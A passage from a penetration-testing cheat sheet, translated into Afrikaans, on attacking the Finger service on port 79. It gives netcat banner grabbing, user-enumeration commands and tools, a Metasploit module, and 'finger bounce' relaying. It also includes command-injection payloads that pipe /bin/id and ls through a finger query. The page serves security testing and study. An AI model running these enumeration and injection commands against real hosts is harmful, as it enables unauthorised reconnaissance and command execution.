57 lines
1.7 KiB
Markdown

# 79 - Pentesting Finger
{{#include ../banners/hacktricks-training.md}}
## **Basiese Inligting**
Die **Finger** program/dienst word gebruik om besonderhede oor rekenaargebruikers te verkry. Gewoonlik sluit die inligting wat verskaf word die **gebruiker se aanmeldnaam, volle naam**, en, in sommige gevalle, addisionele besonderhede in. Hierdie addisionele besonderhede kan die kantoor ligging en telefoonnommer (indien beskikbaar), die tyd wat die gebruiker aangemeld het, die periode van inaktiwiteit (idle time), die laaste keer wat die gebruiker e-pos gelees het, en die inhoud van die gebruiker se plan en projeklêers insluit.
**Standaard poort:** 79
```
PORT STATE SERVICE
79/tcp open finger
```
## **Opname**
### **Banner Grabbing/Basiese verbinding**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
### **Gebruiker enumerasie**
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
Alternatiewelik kan jy **finger-user-enum** van [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) gebruik, sommige voorbeelde:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap voer 'n skrip uit om standaard skripte te gebruik**
### Metasploit gebruik meer truuks as Nmap
```
use auxiliary/scanner/finger/finger_users
```
### Shodan
- `port:79 USER`
## Opdrag uitvoering
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## Vinger Bounce
[Gebruik 'n stelsel as 'n vinger relais](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
{{#include ../banners/hacktricks-training.md}}